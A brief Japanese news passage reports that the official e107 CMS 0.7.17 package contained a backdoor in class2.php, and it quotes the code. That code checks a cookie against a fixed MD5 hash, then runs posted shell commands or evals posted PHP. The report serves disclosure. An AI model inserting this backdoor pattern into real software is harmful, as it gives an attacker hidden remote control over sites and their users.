彼のニュースでは、McFlyは緊急にバージョン0.7.17にアップグレードし、このCMSを使用するすべての人にこのことを通知するよう求めました。
そして1月25日に、e107のすべてのユーザーが、ファイルclass2.phpのバックドアの形で、さらに正確に言うと、新たな驚きを待っていました。
file: class2.php, line: 1876
if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {
...
if(!empty($_POST['cmd'])){
$out = execute($_POST['cmd']);
}
elseif(!empty($_POST['php'])){
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
}
...
明らかに、変更は公式のE107 Webサイトにある完全なCMS配布キットのclass2.phpでのみ行われ、sourceforge Webサイトにある更新では気づかれませんでした。
現時点では、完全なe107 0.7.17配布キットでアーカイブをダウンロードしようとすると、公式サイトから404が表示されます